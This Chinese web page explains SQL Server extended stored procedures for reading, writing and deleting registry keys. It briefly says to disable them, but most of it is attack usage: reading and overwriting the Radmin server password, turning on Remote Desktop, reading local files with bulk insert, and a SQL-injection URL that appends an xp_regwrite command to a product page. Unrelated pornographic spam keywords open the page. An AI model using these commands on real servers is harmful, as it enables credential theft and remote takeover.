欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

幾個(gè)擴(kuò)展存儲過程使用方法

 更新時(shí)間:2010年07月25日 21:10:09   作者:  
sqlserver里面有一些危險(xiǎn)的擴(kuò)展存儲過程,可以操作注冊表,所以很多情況下,下面的存儲過程為了服務(wù)器安全都會將這些存儲過程刪除。不過防御與安全同等重要。下面是具體的注冊的操作方法。
SQL Server中包含了幾個(gè)可以訪問系統(tǒng)注冊表的擴(kuò)展存儲過程.但實(shí)際上這幾個(gè)擴(kuò)展存儲過程是未公開的,從sql server 7.0就有了,
在SQL server 2000中仍然保留,他們以后可能會刪除.但是這幾個(gè)存儲過程卻提供了在當(dāng)前的SQL Server版本中訪問系統(tǒng)注冊表的能力,
而且很多人利用SQL Server來進(jìn)行攻擊系統(tǒng)時(shí),往往都會用到這幾個(gè)擴(kuò)展存儲過程.所以最好在SQL Server中禁用他們.
xp_regenumvalues 以多個(gè)記錄集方式返回所有鍵值
使用方法:
xp_regenumvalues 注冊表根鍵, 子鍵
比如說,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有鍵值:

use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'

xp_regread 返回制定鍵的值
使用方法:
xp_regread 根鍵,子鍵,鍵值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密碼
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
遠(yuǎn)程桌面開啟為0
xp_regwrite 寫入注冊表
使用方法:
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必須清空后再寫新數(shù)值
修改成功的前提是值為空
注意值類型有2種REG_SZ 表示字符型,相當(dāng)于新建字符串值,REG_DWORD 表示整型,相當(dāng)于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用遠(yuǎn)程桌面
xp_regdeletevalue 刪除某個(gè)值
使用方法:
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'

xp_regdeletekey 刪除鍵,包括該鍵下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'

運(yùn)行前提SA
可能用處不是很大,也沒深入研究,因?yàn)橛X得讀asp用xp_makecab更方便點(diǎn),僅供思維擴(kuò)展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
開啟遠(yuǎn)程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--

相關(guān)文章

最新評論